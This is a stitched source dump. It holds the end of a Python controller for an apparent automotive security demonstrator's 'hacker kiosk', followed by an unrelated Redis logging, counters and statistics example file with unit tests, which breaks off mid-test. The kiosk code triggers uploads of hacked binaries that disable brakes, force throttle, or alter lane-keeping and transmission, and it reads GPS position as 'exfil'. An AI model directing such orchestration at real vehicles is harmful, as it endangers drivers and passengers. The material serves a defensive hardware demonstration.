self.switchActiveScenario(canlib.SCENARIO_BASELINE)
# Reset SSITH ECU scenario components
self.restartComponent(canlib.INFOTAINMENT_SERVER_3)
self.restartComponent(canlib.OTA_UPDATE_SERVER_3)
# FIXME: reset CHERI just in case
#self.restartComponent(canlib.TARGET_3)
# TODO: No need to reset Info server 2?
# Infotainment server 3 is in the secure ECU scenario
# TODO: Wait till the reset is complete?
# Reset state
self.hack12_has_been_initialized = False
# Respond
self.ipc_msg['status'] = 200 # OK
@page
def hack02_kiosk_intro_enter(self, arg):
"""
Reset is complete
No action needed
"""
self.button_pressed_next = False
# Respond
self.ipc_msg['status'] = 200 # OK
@page
def hack05_info_attempt_enter(self, arg):
"""
Hack OTA server
* hack the server
* upload hacked infotainment
"""
self.button_pressed_next = False
hack_ok = self.hack_ota_and_upload_hacked_infotainment_server()
self.ipc_msg['retval'] = hack_ok
self.ipc_msg['status'] = 200 # OK
@page
def hack06_info_exploit_enter(self, arg):
"""
Wait for the exploit selection
"""
self.button_pressed_next = False
self.exploit_complete = False
self.ipc_msg['status'] = 200 # OK
@page
def hack06_info_exploit_attemp_hack_enter(self, arg):
"""
Attempt a selected infotainment exploit
* check args for which hack to use
"""
self.button_pressed_info_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_infotainment_hack(arg)
self.ipc_msg['status'] = 200 # OK
@page
def hack08_critical_exploit_enter(self, arg):
"""
Attempt a selected critical exploit
* check args for which hack to use
"""
self.button_pressed_critical_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_ecu_hack(arg)
self.ipc_msg['status'] = 200 # OK
@page
def hack09_protect_enter(self, arg):
"""
Switch to SSITH_INFOTAINMENT_SCENARIO
NOTE: Reset baseline target(s) here to save time?
"""
self.button_pressed_next = False
self.hackActive(canlib.HACK_NONE)
self.switchActiveScenario(canlib.SCENARIO_SECURE_INFOTAINMENT)
# Reset components for the baseline scenario
self.restartComponent(canlib.INFOTAINMENT_SERVER_1)
self.restartComponent(canlib.OTA_UPDATE_SERVER_1)
self.restartComponent(canlib.TARGET_1)
self.ipc_msg['status'] = 200 # OK
@page
def hack10_protect_info_attempt_enter(self, arg):
"""
Attempt OTA hack
"""
self.button_pressed_ssith_infotainment = False
hack_ok = self.hack_ota_and_upload_hacked_infotainment_server()
self.ipc_msg['retval'] = hack_ok
self.ipc_msg['status'] = 200 # OK
@page
def hack10_info_exploit_attempt_hack_enter(self, arg):
"""
Attempt a selected infotainment exploit
"""
self.button_pressed_info_exploit = False
self.exploit_complete = True
self.execute_infotainment_hack(arg)
# NOTE: we assume that the hack failed.
# To properly check if the hack was successful or not,
# we would have to listen to the hacked infotainment
# UDP traffic, and see if a state has changed *after*
# a button is pressed.
self.ipc_msg['retval'] = "Hack Failed"
self.ipc_msg['status'] = 200 # OK
@page
def hack12_protect_critical_enter(self, arg):
"""
If active scenario is NOT the SSITH_ECU,
switch to SSITH_ECU scenario
"""
self.button_pressed_ssith_ecu = False
if not self.hack12_has_been_initialized:
self.switchActiveScenario(canlib.SCENARIO_SECURE_ECU)
self.hack12_has_been_initialized = True
self.ipc_msg['status'] = 200 # OK
@page
def hack12_critical_exploit_enter(self, arg):
"""
Attempt a selected ecu exploit
"""
self.button_pressed_critical_exploit = False
self.exploit_complete = True
# `ipc_msg` is updated accordingly
self.execute_ecu_hack(arg)
self.ipc_msg['status'] = 200 # OK
def switchActiveScenario(self, scenario_id) -> bool:
"""
Switching active scenario
* update active scenario ID
* notify peers
* new OTA client instance (adjusted URL)
"""
# Update state
self.active_scenario = scenario_id
# Reset internal states
self.resetEcuState()
# Set OTA client
url = f"http://{HackerKiosk.OTA_SERVER_IP[self.active_scenario]}:{self.ota_server_port}"
print(f"Setting up OTA client with URL: {url}")
print(f"CMD_CHANGE_ACTIVE_SCENARIO: {ComponentDictionary[scenario_id]}")
self.ota_server = kclient.HackOtaClient(url)
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_ACTIVE_SCENARIO,
data=struct.pack(canlib.CAN_FORMAT_CMD_ACTIVE_SCENARIO, scenario_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def restartComponent(self, component_id) -> bool:
"""
Notify peers about the restart (AdminPC is doing the restart)
TODO: wait for some sort of response?
"""
print(f"CAN_ID_CMD_RESTART: {ComponentDictionary[component_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_RESTART,
data=struct.pack(canlib.CAN_FORMAT_CMD_RESTART, component_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def hackActive(self, hack_id) -> bool:
"""
Notify peers about the active hack (only in BASELINE scenario)
(Ignition LED manager changes LED pattern)
"""
print(f"CAN_ID_CMD_HACK_ACTIVE: {ComponentDictionary[hack_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_CMD_HACK_ACTIVE,
data=struct.pack(canlib.CAN_FORMAT_CMD_HACK_ACTIVE, hack_id))
self.cmd_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def buttonPressed(self, button_id) -> bool:
"""
Mimic an infotainment client and send button press to
the hacked info server, over UDP CAN network with a special port
"""
print(f"CAN_ID_BUTTON_PRESSED: {ButtonDictionary[button_id]}")
try:
msg = Message(arbitration_id=canlib.CAN_ID_BUTTON_PRESSED,
data=struct.pack(canlib.CAN_FORMAT_BUTTON_PRESSED, button_id))
self.infotainment_bus.send(msg)
return True
except Exception as exc:
print(f"<{self.__class__.__name__}> Error sending message: {msg}: {exc}")
return False
def execute_infotainment_hack(self, arg):
"""
Parse `arg`, and either:
* send `buttonPressed` message (volume/music)
* or listen to the incoming position messages (GPS exfil)
* updates `retval` accordingly
NOTE: there is (currently) no confirmation that the server received
the message
"""
if arg == "volumeUp":
self.buttonPressed(canlib.BUTTON_VOLUME_UP)
self.ipc_msg['retval'] = "Volume increased"
elif arg == "volumeDown":
self.buttonPressed(canlib.BUTTON_VOLUME_DOWN)
self.ipc_msg['retval'] = "Volume decreased"
elif arg == "exfil":
self.ipc_msg['retval'] = f"{self.x}, {self.y}, {self.z}"
elif arg == "changeStation_1":
self.buttonPressed(canlib.BUTTON_STATION_1)
self.ipc_msg['retval'] = "Station set to 1"
self.ipc_msg['args'] = 'changeStation'
elif arg == "changeStation_2":
self.buttonPressed(canlib.BUTTON_STATION_2)
self.ipc_msg['retval'] = "Station set to 2"
self.ipc_msg['args'] = 'changeStation'
elif arg == "changeStation_3":
self.buttonPressed(canlib.BUTTON_STATION_3)
self.ipc_msg['retval'] = "Station set to 3"
self.ipc_msg['args'] = 'changeStation'
else:
print(f"Unkwon arg: {arg}")
self.ipc_msg['retval'] = "Error"
def execute_ecu_hack(self, arg):
"""
Parse `arg` and upload & execute hacked/nominal
binary to the target OTA server
* Binary is target dependent (has a specific IP)
NOTE: simplify / make it a pattern?
"""
if self.active_scenario == canlib.SCENARIO_BASELINE:
if self.deploy_mode:
suffix = "_baseline.elf"
else:
suffix = "_baseline-arm.elf"
elif self.active_scenario == canlib.SCENARIO_SECURE_INFOTAINMENT:
if self.deploy_mode:
suffix = "_ssithInfo.elf"
else:
suffix = "_ssithInfo-arm.elf"
elif self.active_scenario == canlib.SCENARIO_SECURE_ECU:
if self.deploy_mode:
suffix = "_ssithEcu.elf"
else:
suffix = "_ssithEcu-arm.elf"
else:
# This shouldn't happen
print(f"Unknown scenario! {self.active_scenario}")
return
if arg == "brakes":
if self.brakes_ok:
# Brakes are OK, we want them OFF(hacked)
filename = HackerKiosk.BRAKES_HACKED_HACK_PATH + suffix
else:
# brakes are OFF, we want them back ON
filename = HackerKiosk.BRAKES_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.brakes_ok = not self.brakes_ok
# Always provide returnval
self.ipc_msg['retval'] = self.brakes_ok
if not self.brakes_ok:
self.hackActive(canlib.HACK_BRAKE)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "throttle":
if self.throttle_ok:
# Throttle is OK, we want to hack it (full throttle)
filename = HackerKiosk.THROTTLE_HACKED_HACK_PATH + suffix
else:
# Throttle is hacked, restore nominal operation
filename = HackerKiosk.THROTTLE_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.throttle_ok = not self.throttle_ok
# Always provide returnval
self.ipc_msg['retval'] = self.throttle_ok
if not self.throttle_ok:
self.hackActive(canlib.HACK_THROTTLE)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "lkas":
if self.lkas_disabled:
# LKAS is disabled, we want to enable it (hack it)
filename = HackerKiosk.LKAS_HACKED_HACK_PATH + suffix
else:
# LKAS is enabled, we want to disable it (nominal)
filename = HackerKiosk.LKAS_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.lkas_disabled = not self.lkas_disabled
# Always provide returnval
self.ipc_msg['retval'] = self.lkas_disabled
if not self.lkas_disabled:
self.hackActive(canlib.HACK_LKAS)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
elif arg == "transmission":
if self.transmission_ok:
# Transmission is OK, we want to disable it (hack it)
filename = HackerKiosk.TRANSMISSION_HACKED_HACK_PATH + suffix
else:
# Transmission is disabled/hacked, we want to enable it
# (back to nominal)
filename = HackerKiosk.TRANSMISSION_NOMINAL_HACK_PATH + suffix
if self.deploy_mode:
hack_ok, res = self.ota_server.upload_and_execute_file(filename)
print(res)
else:
# Execute critical hack from the host
cmd = f"{filename}"
subprocess.call(cmd,shell=True)
hack_ok = True
# Update status only if hack_ok
if hack_ok:
self.transmission_ok = not self.transmission_ok
# Always provide returnval
self.ipc_msg['retval'] = self.transmission_ok
if not self.transmission_ok:
self.hackActive(canlib.HACK_TRANSMISSION)
else:
if self.brakes_ok and self.throttle_ok and self.transmission_ok and self.lkas_disabled:
self.hackActive(canlib.HACK_NONE)
else:
print(f"Unknown arg: {arg}")
self.ipc_msg['retval'] = False
|
app_support_funcs.py
|
import bisect
import contextlib
import csv
from datetime import datetime
import functools
import json
import logging
import random
import threading
import time
import unittest
import uuid
import redis
def to_bytes(x):
return x.encode() if isinstance(x, str) else x
def to_str(x):
return x.decode() if isinstance(x, bytes) else x
QUIT = False
SAMPLE_COUNT = 100
config_connection = None
# <start id="recent_log"/>
SEVERITY = { # A
logging.DEBUG: 'debug', # A
logging.INFO: 'info', # A
logging.WARNING: 'warning', # A
logging.ERROR: 'error', # A
logging.CRITICAL: 'critical', # A
} # A
SEVERITY.update((name, name) for name in list(SEVERITY.values())) # A
def log_recent(conn, name, message, severity=logging.INFO, pipe=None):
severity = str(SEVERITY.get(severity, severity)).lower() # B
destination = 'recent:%s:%s' % (name, severity) # C
message = time.asctime() + ' ' + message # D
pipe = pipe or conn.pipeline() # E
pipe.lpush(destination, message) # F
pipe.ltrim(destination, 0, 99) # G
pipe.execute() # H
# <end id="recent_log"/>
# A Set up a mapping that should help turn most logging severity levels into something consistent
# B Actually try to turn a logging level into a simple string
# C Create the key that messages will be written to
# D Add the current time so that we know when the message was sent
# E Set up a pipeline so we only need 1 round trip
# F Add the message to the beginning of the log list
# G Trim the log list to only include the most recent 100 messages
# H Execute the two commands
# END
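# A minimal usage sketch for log_recent() (not part of the original listing;
# it assumes `conn` is a redis.Redis instance):
#
#   conn = redis.Redis()
#   log_recent(conn, 'main', 'User 235 logged in')
#   conn.lrange('recent:main:info', 0, -1)   # most recent messages, newest first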
# <start id="common_log"/>
def log_common(conn, name, message, severity=logging.INFO, timeout=5):
severity = str(SEVERITY.get(severity, severity)).lower() # A
destination = 'common:%s:%s' % (name, severity) # B
start_key = destination + ':start' # C
pipe = conn.pipeline()
end = time.time() + timeout
while time.time() < end:
try:
pipe.watch(start_key) # D
now = datetime.utcnow().timetuple() # E
hour_start = datetime(*now[:4]).isoformat() # F
existing = pipe.get(start_key)
pipe.multi() # H
if existing and existing < to_bytes(hour_start): # G
pipe.rename(destination, destination + ':last') # I
pipe.rename(start_key, destination + ':pstart') # I
pipe.set(start_key, hour_start) # J
elif not existing: # J
pipe.set(start_key, hour_start) # J
pipe.zincrby(destination, 1, message) # K
log_recent(pipe, name, message, severity, pipe) # L
return
except redis.exceptions.WatchError:
continue # M
# <end id="common_log"/>
# A Handle the logging level
# B Set up the destination key for keeping recent logs
# C Keep a record of the start of the hour for this set of messages
# D We are going to watch the start of the hour key for changes that only happen at the beginning of the hour
# E Get the current time
# F Find the current start hour
# G If the current list of common logs is for a previous hour
# H Set up the transaction
# I Move the old common log information to the archive
# J Update the start of the current hour for the common logs
# K Actually increment our common counter
# L Call the log_recent() function to record these there, and rely on its call to execute()
# M If we got a watch error from someone else archiving, try again
# END
# <start id="update_counter"/>
PRECISION = [1, 5, 60, 300, 3600, 18000, 86400] # A
def update_counter(conn, name, count=1, now=None):
now = now or time.time() # B
pipe = conn.pipeline() # C
for prec in PRECISION: # D
pnow = int(now / prec) * prec # E
hash = '%s:%s' % (prec, name) # F
pipe.zadd('known:', {hash: 0}) # G
pipe.hincrby('count:' + hash, pnow, count) # H
pipe.execute()
# <end id="update_counter"/>
# A The precision of the counters in seconds: 1 second, 5 seconds, 1 minute, 5 minutes, 1 hour, 5 hours, 1 day - adjust as necessary
# B Get the current time so we know which time slice the count should be added to
# C Create a transactional pipeline so that later cleanup can work correctly
# D Add entries for all precisions that we record
# E Get the start of the current time slice
# F Create the named hash where this data will be stored
# G Record a reference to the counters into a ZSET with the score 0 so we can clean up after ourselves
# H Update the counter for the given name and time precision
# END
# <start id="get_counter"/>
def get_counter(conn, name, precision):
hash = '%s:%s' % (precision, name) # A
data = conn.hgetall('count:' + hash) # B
to_return = [] # C
for key, value in data.items(): # C
to_return.append((int(key), int(value))) # C
to_return.sort() # D
return to_return
# <end id="get_counter"/>
# A Get the name of the key where we will be storing counter data
# B Fetch the counter data from Redis
# C Convert the counter data into something more expected
# D Sort our data so that older samples are first
# END
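# A minimal usage sketch for the counter functions (not part of the original
# listing; it assumes `conn` is a redis.Redis instance):
#
#   update_counter(conn, 'hits')      # bump the "hits" counter at every precision
#   get_counter(conn, 'hits', 5)      # -> [(time_slice, count), ...], oldest first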
# <start id="clean_counters"/>
def clean_counters(conn):
pipe = conn.pipeline(True)
passes = 0 # A
while not QUIT: # C
start = time.time() # D
index = 0 # E
while index < conn.zcard('known:'): # E
hash = conn.zrange('known:', index, index) # F
index += 1
if not hash:
break
hash = hash[0]
prec = int(hash.partition(b':')[0]) # G
bprec = int(prec // 60) or 1 # H
if passes % bprec: # I
continue
hkey = 'count:' + to_str(hash)
cutoff = time.time() - SAMPLE_COUNT * prec # J
samples = list(map(int, conn.hkeys(hkey))) # K
samples.sort() # L
remove = bisect.bisect_right(samples, cutoff) # L
if remove: # M
conn.hdel(hkey, *samples[:remove]) # M
if remove == len(samples): # N
try:
pipe.watch(hkey) # O
if not pipe.hlen(hkey): # P
pipe.multi() # P
pipe.zrem('known:', hash) # P
pipe.execute() # P
index -= 1 # B
else:
pipe.unwatch() # Q
except redis.exceptions.WatchError: # R
pass # R
passes += 1 # S
duration = min(int(time.time() - start) + 1, 60) # S
time.sleep(max(60 - duration, 1)) # T
# <end id="clean_counters"/>
# A Keep a record of the number of passes so that we can balance cleaning out per-second vs. per-day counters
# C Keep cleaning out counters until we are told to stop
# D Get the start time of the pass to calculate the total duration
# E Incrementally iterate over all known counters
# F Get the next counter to check
# G Get the precision of the counter
# H We are going to be taking a pass every 60 seconds or so, so we are going to try to clean out counters at roughly the rate that they are written to
# I Try the next counter if we aren't supposed to check this one on this pass (for example, we have taken 3 passes, but the counter has a precision of 5 minutes)
# J Find the cutoff time for the earliest sample that we should keep, given the precision and number of samples that we want to keep
# K Fetch the times of the samples, and convert the strings to integers
# L Determine the number of samples that should be deleted
# M Remove the samples as necessary
# N We have a reason to potentially remove the counter from the list of known counters ZSET
# O Watch the counter hash for changes
# P Verify that the counter hash is empty, and if so, remove it from the known counters
# B If we deleted a counter, then we can use the same index next pass
# Q The hash is not empty, keep it in the list of known counters
# R Someone else changed the counter hash by adding counters, which means that it has data, so we will leave the counter in the list of known counters
# S Update our passes and duration variables for the next pass, as an attempt to clean out counters as often as they are seeing updates
# T Sleep the remainder of the 60 seconds, or at least 1 second, just to offer a bit of a rest
# END
# <start id="update_stats"/>
def update_stats(conn, context, type, value, timeout=5):
""" Access time on every page """
destination = 'stats:%s:%s' % (context, type) # A
start_key = destination + ':start' # B
pipe = conn.pipeline(True)
end = time.time() + timeout
while time.time() < end:
try:
pipe.watch(start_key) # B
now = datetime.utcnow().timetuple() # B
hour_start = datetime(*now[:4]).isoformat() # B
existing = pipe.get(start_key)
pipe.multi()
if not existing:
pipe.set(start_key, hour_start)
elif existing < hour_start:
pipe.rename(destination, destination + ':last') # B
pipe.rename(start_key, destination + ':pstart') # B
pipe.set(start_key, hour_start) # B
tkey1 = str(uuid.uuid4())
tkey2 = str(uuid.uuid4())
pipe.zadd(tkey1, {'min': value}) # C
pipe.zadd(tkey2, {'max': value}) # C
pipe.zunionstore(destination, # D
[destination, tkey1], aggregate='min') # D
pipe.zunionstore(destination, # D
[destination, tkey2], aggregate='max') # D
pipe.delete(tkey1, tkey2) # E
pipe.zincrby(destination, 1, 'count') # F
pipe.zincrby(destination, value, 'sum') # F
pipe.zincrby(destination, value * value, 'sumsq') # F
return pipe.execute()[-3:] # G
except redis.exceptions.WatchError:
continue # H
# <end id="update_stats"/>
# A Set up the destination statistics key
# B Handle the current hour/last hour like in common_log()
# C Add the value to the temporary keys
# D Union the temporary keys with the destination stats key with the appropriate min/max aggregate
# E Clean up the temporary keys
# F Update the count, sum, and sum of squares members of the zset
# G Return the base counter info so that the caller can do something interesting if necessary
# H If the hour just turned over and the stats have already been shuffled over, try again
# END
# <start id="get_stats"/>
def get_stats(conn, context, type):
key = 'stats:%s:%s' % (context, type) # A
data = dict(conn.zrange(key, 0, -1, withscores=True)) # B
data[b'average'] = data[b'sum'] / data[b'count'] # C
numerator = data[b'sumsq'] - data[b'sum'] ** 2 / data[b'count'] # D
data[b'stddev'] = (numerator / (data[b'count'] - 1 or 1)) ** .5 # E
return data
# <end id="get_stats"/>
# A Set up the key that we are fetching our statistics from
# B Fetch our basic statistics and package them as a dictionary
# C Calculate the average
# D Prepare the first part of the calculation of standard deviation
# E Finish our calculation of standard deviation
# END
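# A minimal usage sketch for the statistics helpers (not part of the original
# listing; it assumes `conn` is a redis.Redis instance):
#
#   update_stats(conn, 'ProfilePage', 'AccessTime', 0.35)
#   stats = get_stats(conn, 'ProfilePage', 'AccessTime')
#   stats[b'average'], stats[b'stddev']   # keys are bytes with a default client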
# <start id="access_time_context_manager"/>
@contextlib.contextmanager # A
def access_time(conn, context):
start = time.time() # B
yield # C
delta = time.time() - start # D
stats = update_stats(conn, context, 'AccessTime', delta) # E
average = stats[1] / stats[0] # F
pipe = conn.pipeline(True)
pipe.zadd('slowest:AccessTime', {context: average}) # G
pipe.zremrangebyrank('slowest:AccessTime', 0, -101) # H
pipe.execute()
# <end id="access_time_context_manager"/>
# A Make this Python generator into a context manager
# B Record the start time
# C Let the block of code that we are wrapping run
# D Calculate the time that the block took to execute
# E Update the stats for this context
# F Calculate the average
# G Add the average to a ZSET that holds the slowest access times
# H Keep the slowest 100 items in the AccessTime ZSET
# END
# <start id="access_time_use"/>
def process_view(conn, callback): # A
with access_time(conn, request.path): # B
return callback() # C
# <end id="access_time_use"/>
# A This example web view takes the Redis connection as well as a callback to generate the content
# B This is how you would use the access time context manager to wrap a block of code
# C This is executed when the 'yield' statement is hit from within the context manager
# END
# <start id="_1314_14473_9188"/>
def ip_to_score(ip_address):
score = 0
for v in ip_address.split('.'):
score = score * 256 + int(v, 10)
return score
# <end id="_1314_14473_9188"/>
# END
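# A worked example of the conversion above (illustration only):
#
#   ip_to_score('1.2.3.4') == ((1 * 256 + 2) * 256 + 3) * 256 + 4 == 16909060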
# <start id="_1314_14473_9191"/>
def import_ips_to_redis(conn, filename): # A
csv_file = csv.reader(open(filename, 'r', encoding='latin-1', newline=''))
for count, row in enumerate(csv_file):
start_ip = row[0] if row else '' # B
if 'i' in start_ip.lower():
continue
if '.' in start_ip: # B
start_ip = ip_to_score(start_ip) # B
elif start_ip.isdigit(): # B
start_ip = int(start_ip, 10) # B
else:
continue # C
city_id = row[2] + '_' + str(count) # D
conn.zadd('ip2cityid:', {city_id: start_ip}) # E
# <end id="_1314_14473_9191"/>
# A Should be run with the location of the GeoLiteCity-Blocks.csv file
# B Convert the IP address to a score as necessary
# C Header row or malformed entry
# D Construct the unique city id
# E Add the IP address score and City ID
# END
# <start id="_1314_14473_9194"/>
def import_cities_to_redis(conn, filename): # A
for row in csv.reader(open(filename, 'r', encoding='latin-1', newline='')):
if len(row) < 4 or not row[0].isdigit():
continue
row = [to_str(i) for i in row]
city_id = row[0] # B
country = row[1] # B
region = row[2] # B
city = row[3] # B
conn.hset('cityid2city:', city_id, # C
json.dumps([city, region, country])) # C
# <end id="_1314_14473_9194"/>
# A Should be run with the location of the GeoLiteCity-Location.csv file
# B Prepare the information for adding to the hash
# C Actually add the city information to Redis
# END
# <start id="_1314_14473_9197"/>
def find_city_by_ip(conn, ip_address):
if isinstance(ip_address, str): # A
ip_address = ip_to_score(ip_address) # A
city_id = conn.zrevrangebyscore( # B
'ip2cityid:', ip_address, 0, start=0, num=1) # B
if not city_id:
return None
city_id = to_str(city_id[0]).partition('_')[0] # C
return json.loads(conn.hget('cityid2city:', city_id)) # D
# <end id="_1314_14473_9197"/>
# A Convert the IP address to a score for zrevrangebyscore
# B Find the unique city ID
# C Convert the unique city ID to the common city ID
# D Fetch the city information from the hash
# END
# <start id="is_under_maintenance"/>
LAST_CHECKED = None
IS_UNDER_MAINTENANCE = False
def is_under_maintenance(conn):
global LAST_CHECKED, IS_UNDER_MAINTENANCE # A
if (not LAST_CHECKED) or LAST_CHECKED < time.time() - 1: # B
LAST_CHECKED = time.time() # C
IS_UNDER_MAINTENANCE = bool( # D
conn.get('is-under-maintenance')) # D
return IS_UNDER_MAINTENANCE # E
# <end id="is_under_maintenance"/>
# A Set the two variables as globals so we can write to them later
# B Check to see if it has been at least 1 second since we last checked
# C Update the last checked time
# D Find out whether the system is under maintenance
# E Return whether the system is under maintenance
# END
# <start id="set_config"/>
def set_config(conn, type, component, config):
conn.set(
'config:%s:%s' % (type, component),
json.dumps(config))
# <end id="set_config"/>
# END
# <start id="get_config"/>
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s' % (type, component)
ch = CHECKED.get(key)
if (not ch) or ch < time.time() - wait: # A
CHECKED[key] = time.time() # B
config = json.loads(conn.get(key) or '{}') # C
config = dict((str(k), config[k]) for k in config) # G
old_config = CONFIGS.get(key) # D
if config != old_config: # E
CONFIGS[key] = config # F
return CONFIGS.get(key)
# <end id="get_config"/>
# A Check to see if we should update the configuration information about this component
# B We can, so update the last time we checked this connection
# C Fetch the configuration for this component
# G Convert potentially unicode keyword arguments into string keyword arguments
# D Get the old configuration for this component
# E If the configurations are different
# F Update the configuration
# END
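# A minimal round-trip sketch for the config helpers (not part of the original
# listing; it assumes `conn` is a redis.Redis instance):
#
#   set_config(conn, 'redis', 'test', {'db': 15})
#   get_config(conn, 'redis', 'test')   # -> {'db': 15}, cached for `wait` seconds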
# <start id="redis_connection"/>
REDIS_CONNECTIONS = {}
def redis_connection(component, wait=1): # A
key = 'config:redis:' + component # B
def wrapper(function): # C
@functools.wraps(function) # D
def call(*args, **kwargs): # E
old_config = CONFIGS.get(key, object()) # F
config = get_config( # G
config_connection, 'redis', component, wait) # G
if config != old_config: # H
REDIS_CONNECTIONS[key] = redis.Redis(**config) # H
return function( # I
REDIS_CONNECTIONS.get(key), *args, **kwargs) # I
return call # J
return wrapper # K
# <end id="redis_connection"/>
# A We pass the name of the application component to the decorator
# B We cache the configuration key because we will be fetching it every time the function is called
# C Our wrapper takes a function that it wraps with another function
# D Copy some useful metadata from the original function to the configuration handler
# E Create the actual function that will be managing connection information
# F Fetch the old configuration, if any
# G Get the new configuration, if any
# H If the new and old configuration do not match, create a new connection
# I Call and return the result of our wrapped function, remembering to pass the connection and the other matched arguments
# J Return the fully wrapped function
# K Return a function that can wrap our Redis function
# END
'''
# <start id="recent_log_decorator"/>
@redis_connection('logs') #A
def log_recent(conn, app, message): #B
'the old log_recent() code'
log_recent('main', 'User 235 logged in') #C
# <end id="recent_log_decorator"/>
#A The redis_connection() decorator is very easy to use
#B The function definition doesn't change
#C You no longer need to worry about passing the log server connection when calling log_recent()
#END
'''
# --------------- Below this line are helpers to test the code ----------------
class request:
pass
# a faster version with pipelines for actual testing
def import_ips_to_redis(conn, filename):
csv_file = csv.reader(open(filename, 'r', encoding='latin-1', newline=''))
pipe = conn.pipeline(False)
for count, row in enumerate(csv_file):
start_ip = row[0] if row else ''
if 'i' in start_ip.lower():
continue
if '.' in start_ip:
start_ip = ip_to_score(start_ip)
elif start_ip.isdigit():
start_ip = int(start_ip, 10)
else:
continue
city_id = row[2] + '_' + str(count)
pipe.zadd('ip2cityid:', {city_id: start_ip})
if not (count + 1) % 1000:
pipe.execute()
pipe.execute()
def import_cities_to_redis(conn, filename):
pipe = conn.pipeline(False)
for count, row in enumerate(csv.reader(open(filename, 'r', encoding='latin-1', newline=''))):
if len(row) < 4 or not row[0].isdigit():
continue
row = [to_str(i) for i in row]
city_id = row[0]
country = row[1]
region = row[2]
city = row[3]
pipe.hset('cityid2city:', city_id,
json.dumps([city, region, country]))
if not (count + 1) % 1000:
pipe.execute()
pipe.execute()
class TestCh05(unittest.TestCase):
def setUp(self):
global config_connection
import redis
self.conn = config_connection = redis.Redis(db=15)
self.conn.flushdb()
def tearDown(self):
self.conn.flushdb()
del self.conn
global config_connection, QUIT, SAMPLE_COUNT
config_connection = None
QUIT = False
SAMPLE_COUNT = 100
print()
print()
def test_log_recent(self):
import pprint
conn = self.conn
print("Let's write a few logs to the recent log")
for msg in range(5):
log_recent(conn, 'test', 'this is message %s' % msg)
recent = conn.lrange('recent:test:info', 0, -1)
print("The current recent message log has this many messages:", len(recent))
print("Those messages include:")
pprint.pprint(recent[:10])
self.assertTrue(len(recent) >= 5)
def test_log_common(self):
import pprint
conn = self.conn
print("Let's write some items to the common log")
for count in range(1, 6):
for i in range(count):
log_common(conn, 'test', "message-%s" % count)
common = conn.zrevrange('common:test:info', 0, -1, withscores=True)
print("The current number of common messages is:", len(common))
print("Those common messages are:")
pprint.pprint(common)
self.assertTrue(len(common) >= 5)
def test_counters(self):
import pprint
global QUIT, SAMPLE_COUNT
conn = self.conn
print("Let's update some counters for now and a little in the future")
now = time.time()
for delta in range(10):
update_counter(conn, 'test', count=random.randrange(1, 5), now=now + delta)
counter = get_counter(conn, 'test', 1)
print("We have some per-second counters:", len(counter))
self.assertTrue(len(counter) >= 10)
counter = get_counter(conn, 'test', 5)
print("We have some per-5-second counters:", len(counter))
print("These counters include:")
pprint.pprint(counter[:10])
self.assertTrue(len(counter) >= 2)
print()
tt = time.time
def new_tt():
return tt() + 2 * 86400
time.time = new_tt
print("Let's clean out some counters by setting our sample count to 0")
SAMPLE_COUNT = 0
t = threading.Thread(target=clean_counters, args=(conn,))
t.daemon = True  # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.time = tt
counter = get_counter(conn, 'test', 86400)
print("Did we clean out all of the counters?", not counter)
self.assertFalse(counter)
def test_stats(self):
import pprint
conn = self.conn
print("Let's add some data for our statistics!")
for i in range(5):
r = update_stats(conn, 'temp', 'example', random.randrange(5, 15))
print("We have some aggregate statistics:", r)
rr = get_stats(conn, 'temp', 'example')
print("Which we can also fetch manually:")
pprint.pprint(rr)
self.assertTrue(rr[b'count'] >= 5)
def test_access_time(self):
import pprint
conn = self.conn
print("Let's calculate some access times...")
for i in range(10):
with access_time(conn, "req-%s" % i):
time.sleep(.5 + random.random())
print("The slowest access times are:")
atimes = conn.zrevrange('slowest:AccessTime', 0, -1, withscores=True)
pprint.pprint(atimes[:10])
self.assertTrue(len(atimes) >= 10)
print()
def cb():
time.sleep(1 + random.random())
print("Let's use the callback version...")
for i in range(5):
request.path = 'cbreq-%s' % i
process_view(conn, cb)
print("The slowest access times are:")
atimes = conn.zrevrange('slowest:AccessTime', 0, -1, withscores=True)
pprint.pprint(atimes[:10])
self.assertTrue(len(atimes) >= 10)
def test_ip_lookup(self):
conn = self.conn
try:
open('GeoLiteCity-Blocks.csv', 'rb')
open('GeoLiteCity-Location.csv', 'rb')
except:
print("********")
print("You do not have the GeoLiteCity database available, aborting test")
print("Please have the following two files in the current path:")
print("GeoLiteCity-Blocks.csv")
print("GeoLiteCity-Location.csv")
print("********")
return
print("Importing IP addresses to Redis... (this may take a while)")
import_ips_to_redis(conn, 'GeoLiteCity-Blocks.csv')
